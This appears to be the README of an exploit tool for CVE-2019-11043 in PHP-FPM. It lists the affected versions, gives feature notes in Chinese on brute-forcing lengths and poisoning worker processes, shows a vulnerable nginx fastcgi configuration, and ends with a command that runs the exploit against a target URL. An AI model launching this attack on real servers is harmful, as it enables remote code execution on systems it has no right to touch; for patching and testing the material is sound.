In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11
Tested under PHP 7.2.20/7.3.10
1、较为稳定,只要爆破出query长度和Header头字段长度
2、auto_session检测漏洞存在性
3、实现判断目标worker进程数实现健壮性
4、全worker进程污染
location ~ [^/]\.php(/|$) {
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
include fastcgi_params;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
fastcgi_pass 127.0.0.1:9000;
python cve_2019_11043.py -u http://xxxx/index.php